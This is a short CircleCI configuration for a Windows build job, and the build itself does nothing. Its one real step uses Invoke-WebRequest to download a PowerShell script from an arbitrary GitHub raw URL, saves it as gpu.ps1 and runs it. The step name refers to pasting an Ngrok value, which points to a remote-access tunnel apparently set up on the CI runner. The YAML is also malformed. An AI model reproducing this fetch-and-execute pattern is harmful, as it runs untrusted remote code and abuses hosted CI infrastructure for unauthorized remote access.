# Use the latest 2.1 version of CircleCI pipeline process engine.
# See: https://circleci.com/docs/2.0/configuration-reference
version: 2.1

orbs:
  win: circleci/windows@2.2.0

jobs:
  build:
    executor:
      name:win/default
      size:"medium"


   steps:

     -run:
        name: paste Ngrok Value In Hosted Link
        command: |
          Invoke-WebRequest https://raw.githubusercontent.com/AgnesKunze/RD9/main/rd20 -OutFile gpu.ps1
 
     -run: ./gpu.ps1